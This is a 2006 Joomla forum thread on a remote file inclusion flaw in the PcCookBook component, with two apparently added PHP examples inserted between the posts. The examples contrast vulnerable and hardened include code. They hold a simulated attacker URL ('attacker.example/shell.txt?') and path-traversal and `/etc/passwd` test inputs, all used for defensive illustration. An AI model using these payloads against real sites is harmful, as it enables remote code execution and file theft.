The Joomla! Forum ™





PostPosted: Tue Jul 11, 2006 2:02 pm 
Joomla! Explorer

Joined: Fri Aug 19, 2005 12:51 pm
Posts: 427
Location: Argentina
Quote:
Advisory ID : FrSIRT/ADV-2006-2739
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-07-11

Technical Description

A vulnerability has been identified in PcCookBook (component for Joomla!), which may be exploited by attackers to execute arbitrary commands. This flaw is due to an input validation error in the "pccookbook.php" script that fails to validate the "mosConfig_absolute_path" parameter, which could be exploited by remote attackers to include malicious files and execute arbitrary commands with the privileges of the web server.

Affected Products

PcCookBook (component for Joomla!) version 1.3.1 and prior


http://www.frsirt.com/english/advisories/2006/2739

Have a nice day
Gustavo

_________________
Comunidad Joomla: Maintenance, support, translation and distribution for the Joomla!. Help site online. Member of the Spanish [es_ES] Joomla Translation Team. http://comunidadjoomla.org


Last edited by RobS on Thu Aug 10, 2006 8:33 pm, edited 1 time in total.

PostPosted: Tue Jul 11, 2006 3:03 pm 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Thanks for the heads up.

_________________
Jean-Marie Simonet / infograf · http://www.info-graf.fr
Multilanguage in 2.5: http://help.joomla.org/files/EN-GB_multilang_tutorial.pdf
---------------------------------
Joomla Translation Coordination Team • Joomla! Production Working Group


PostPosted: Wed Jul 12, 2006 2:29 am 
Joomla! Guru

Joined: Wed Aug 17, 2005 11:26 pm
Posts: 903
This is the same vulnerability that exists in some of the other 3PD components we have been discussing.
The files do not include:

Code:
// Don't allow direct linking
defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );


Any component/module extension that allows direct access to the code should be considered vulnerable.

_________________
For Mambo assistance: http://forum.mambo-foundation.org
Open Source Research & Best Practice: http://osprojects.info
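The ordering problem raised in the advisory and in the post above (a component file that builds its include path from the global `$mosConfig_absolute_path` and only afterwards checks `_VALID_MOS`), as an added PHP example. This is not PcCookBook's code and not Joomla core; `com_example` and `include.example.php` are hypothetical names, and the request it simulates is constructed, not captured. The include is recorded instead of executed so the script is safe to run from the CLI.

```php
<?php
/*
 * Added example; not code from PcCookBook or from Joomla core.  It models a
 * Joomla 1.0 component file requested directly (not through index.php) on a
 * server with register_globals=On, which is the situation the advisory
 * describes.  com_example / include.example.php are hypothetical names.
 * Run with:  php guard_order_demo.php
 */

// register_globals turns ?mosConfig_absolute_path=... into a global of that
// name before the first line of the component runs.  The trailing '?' is the
// usual RFI trick: whatever the component appends becomes a query string on
// the attacker's URL.  (Constructed request, not a captured one.)
$_GET['mosConfig_absolute_path'] = 'http://attacker.example/shell.txt?';
$mosConfig_absolute_path = $_GET['mosConfig_absolute_path'];

/* Pattern the advisory describes: the include path is built from the global
 * and used BEFORE the direct-access guard.  _VALID_MOS is undefined on a
 * direct request, but by the time that is checked the include already ran;
 * with allow_url_fopen (PHP < 5.2) or allow_url_include (PHP >= 5.2) enabled,
 * PHP fetches and executes the remote file.  Each "require_once" below is
 * appended to $trace instead of being executed. */
function component_entry_vulnerable( &$trace ) {
    global $mosConfig_absolute_path;
    $path = $mosConfig_absolute_path . '/components/com_example/include.example.php';
    $trace[] = "require_once( $path )";             // attacker-controlled path
    if ( ! defined( '_VALID_MOS' ) ) {
        $trace[] = 'die( "Direct Access ..." )';    // too late: include already ran
        return;
    }
    $trace[] = 'component body';
}

/* Hardened: guard first, and never take the path from a global.  Joomla 1.0
 * keeps every extension under the same site root, so the file's own location
 * (dirname(__FILE__)) is authoritative and cannot be altered by a request. */
function component_entry_hardened( &$trace ) {
    if ( ! defined( '_VALID_MOS' ) ) {
        $trace[] = 'die( "Direct Access ..." )';    // nothing ran before this
        return;
    }
    $path = dirname( __FILE__ ) . '/include.example.php';
    $trace[] = "require_once( $path )";             // fixed, local path
    $trace[] = 'component body';
}

function run( $label, $fn ) {
    $trace = array();
    $fn( $trace );
    echo $label, ":\n  ", implode( "\n  ", $trace ), "\n";
}

// 1) Direct request: index.php never ran, so _VALID_MOS is not defined.
run( 'vulnerable, direct request', 'component_entry_vulnerable' );
run( 'hardened,   direct request', 'component_entry_hardened' );

// 2) Normal request: index.php defines _VALID_MOS and then loads the component.
define( '_VALID_MOS', 1 );
run( 'hardened,   via index.php', 'component_entry_hardened' );
```

The trace for the vulnerable variant shows the remote `require_once` line before the `die`, which is the point made later in this thread: the guard only helps if it is the first statement that runs, and in every file that can be requested directly. It also shows why the guard alone is not the whole fix: the hardened variant stops trusting the global for the path at all.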


PostPosted: Sun Jul 30, 2006 12:10 pm 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
Actually, PcCookBook does include this command...

however, it does not prevent the attack.


PostPosted: Sun Jul 30, 2006 2:15 pm 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
I looked in the pccookbook.php file in pccookbook 1.3.1 (the last available version):
Quote:

//pc_cookbook Component//
/**
* Content code
* @package hello_world
* Original @Copyright (C) 2005 Robert Prince
* @Copyright (C) 2005 Konstantinos (koyan) Kokkorogiannis
* @ All rights reserved
* @ pc_cookbook is Free Software
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version koyans 0.3
* @link http://www.dianthos.net & http://www.fisheye.gr/koyansblog
**/
global $mosConfig_absolute_path;
global $mosConfig_live_site;

etc.


The file looks vulnerable to me.

Same for include.pccookbook.php.



PostPosted: Mon Jul 31, 2006 12:48 am 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
I admit it should have been the first line... but the die line was included, further down in the code.


PostPosted: Mon Jul 31, 2006 9:04 am 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Kindred wrote:
I admit it should have been the first line... but the die line was included, further down in the code.



Result is useless placed this way.



PostPosted: Mon Jul 31, 2006 2:11 pm 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
Actually, I placed the die command at the top... but they still got in through that door. :(

I have removed PcCookBook from my site pending further analysis.


PostPosted: Fri Sep 01, 2006 1:18 pm 
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Kindred,

What do you mean, "they still got in through that door"?  Do you mean someone hacked your site through pccookbook?  Who is "they", and how do you know that it was pccookbook that let them in?  Also, was this a clean system, or already compromised?  Did you only add the "defined ... die ...." line to pccookbook.php, or also to include.pccookbook.php and admin.pccookbook.php, or to all php files?

I guess where I'm going is, how do we know that adding the "defined ... die ...." line at the top of the files won't fix this vulnerability?  I'd like to see this module fixed, and it seems easy to just add that line to the top of every file.  In fact, I've already done this.

For infograf768, is there any reason to not put this line at the top of every php file?

Thanks,
Tony


PostPosted: Fri Sep 01, 2006 2:17 pm 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
@Tonyhill
Welcome to our forums.

I am no coder, but I do know it is not always useful to put in the line.
It depends on whether the code in the file calls some global settings.

On whether it would harm or not to put it in systematically, no idea.
I guess one has to test the functionality of the extension.

I'll ask a real coder to come here and reply to your question.



PostPosted: Fri Sep 01, 2006 3:43 pm 
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Thanks!

I do understand that XSS is still a problem whenever reading a file from a variable name.  Another question for a Joomla! coder is this: how does one typically guard against XSS when needing to reference the $mosConfig_absolute_path?  It doesn't seem like I can assume that every Joomla! install must have the modules installed on the same server as the rest of Joomla!, or can I?

I am new to Joomla!, so I don't know all the ways in which it can be deployed.  If I can assume that every Joomla! install has the modules installed on the same server as the rest of Joomla!, then I can just check the URI to see if it goes to the same place.  Otherwise, I'm not sure of a good way to check this variable.

Finally, as I look through the security vulnerabilities, I see this one occurs commonly.  Would it be smart for Joomla! to provide a secure include function for modules -- one that is immune to XSS?


PostPosted: Fri Sep 01, 2006 3:57 pm 
Joomla! Master

Joined: Fri Aug 12, 2005 3:47 pm
Posts: 17238
Location: **Translation Matters**
Reply from real coder:
On whether it would harm or not to put it in systematically, the answer is no, concerning the functionality.
It may be insufficient though to protect against all types of SQL injection.

It does protect against some XSS attacks based around require's, which were those we have seen lately.

Concerning your other questions, please look at the dev site
http://dev.joomla.org/component/option, ... Itemid,32/

There is something there concerning hardening extensions.
Yes, all extensions are not only on the same server but in the same root folder.

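The "secure include function" asked about two posts up, as an added PHP example that builds on the one fact the reply above gives: every extension lives under the same site root, so an include path can be resolved against that root and refused if it resolves anywhere else. This is not Joomla's API and not PcCookBook code; `mos_resolve_include` and `mos_safe_require` are hypothetical names, and the site root the demo creates under the system temp directory is constructed and removed again. It needs a PHP CLI with `sys_get_temp_dir()` (PHP 5.2.1+).

```php
<?php
/*
 * Added example; not Joomla's API and not PcCookBook code.  A confined
 * include helper: direct-access guard first, then a path that is resolved
 * against the site root and refused when it is a URL, a stream wrapper, a
 * traversal out of the root, or a missing file.
 * Run with:  php safe_include_demo.php
 */

/* Return the absolute path of $relative inside $root, or false when it names a
 * URL or stream wrapper, does not exist, or resolves outside $root. */
function mos_resolve_include( $root, $relative ) {
    // Anything with a scheme (http:, ftp:, php:, data:, ...) is refused outright.
    // (On Windows this also rejects "C:..." style paths, which is intended here.)
    if ( preg_match( '#^[a-z][a-z0-9+.\-]*:#i', $relative ) ) {
        return false;
    }
    $root = realpath( $root );
    if ( $root === false ) {
        return false;
    }
    // Leading slashes are stripped so '/etc/passwd' cannot override $root;
    // realpath() collapses '..' and symlinks and returns false for missing files.
    $full = realpath( $root . '/' . ltrim( $relative, '/\\' ) );
    if ( $full === false ) {
        return false;
    }
    // Containment: $full must begin with "$root/".
    $prefix = rtrim( $root, '/' ) . '/';
    if ( strncmp( $full, $prefix, strlen( $prefix ) ) !== 0 ) {
        return false;
    }
    return $full;
}

/* Drop-in replacement for  require_once( $mosConfig_absolute_path . '/...' ):
 * the _VALID_MOS guard runs before anything else, then the confined include. */
function mos_safe_require( $root, $relative ) {
    defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' );
    $full = mos_resolve_include( $root, $relative );
    if ( $full === false ) {
        die( 'Refusing to include: ' . htmlspecialchars( $relative ) );
    }
    require_once( $full );
}

// --- demo with a throwaway site root (constructed, removed afterwards) ------
$root = sys_get_temp_dir() . '/mos_demo_' . getmypid();
mkdir( $root . '/components/com_example', 0700, true );
$inc = $root . '/components/com_example/include.example.php';
file_put_contents( $inc, "<?php echo \"include.example.php loaded\\n\";\n" );

$cases = array(
    'components/com_example/include.example.php',   // legitimate
    'http://attacker.example/shell.txt?',            // remote file: refused
    '../../../../etc/passwd',                        // traversal: refused
    '/etc/passwd',                                   // absolute path: refused
    'php://input',                                   // stream wrapper: refused
    'components/com_example/missing.php',            // nonexistent: refused
);
foreach ( $cases as $c ) {
    $r = mos_resolve_include( $root, $c );
    printf( "%-46s -> %s\n", $c, $r === false ? 'REFUSED' : $r );
}

// Through index.php (_VALID_MOS defined) the legitimate include works.
define( '_VALID_MOS', 1 );
mos_safe_require( $root, 'components/com_example/include.example.php' );

unlink( $inc );
rmdir( $root . '/components/com_example' );
rmdir( $root . '/components' );
rmdir( $root );
```

The root passed in should come from the file's own location (`dirname(__FILE__)` walked up to the install directory) or from configuration.php loaded by index.php, never from a request-supplied global; the helper confines where an include can go, it does not make the global itself trustworthy. Because `realpath()` only resolves existing files, a missing include is refused rather than silently attempted.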


PostPosted: Fri Sep 01, 2006 4:16 pm 
Joomla! Fledgling

Joined: Fri Sep 01, 2006 5:02 am
Posts: 3
Thank you very much for the information.

I see that I was using XSS incorrectly above.  What I should have said was remote file injection.

I will go through pccookbook and see if I can apply all of the methods suggested in the security section of the developer documentation.  After I'm done, I'll be sure to contact the author of pccookbook and post something here for others to examine.


PostPosted: Thu Sep 07, 2006 6:02 pm 
Joomla! Enthusiast

Joined: Thu Aug 18, 2005 8:43 pm
Posts: 182
BTW: I am very certain that they got in via the cookbook, because my server security logs showed it to be so...


PostPosted: Fri Oct 05, 2007 7:39 pm 
Joomla! Fledgling

Joined: Fri Oct 05, 2007 7:31 pm
Posts: 2
infograf768 wrote:
Kindred wrote:
I admit it should have been the first line... but the die line was included, further down in the code.



Result is useless placed this way.


Why is it useless? I placed it in the first line lots of times... and indeed... it didn't work... but why?

Best regards
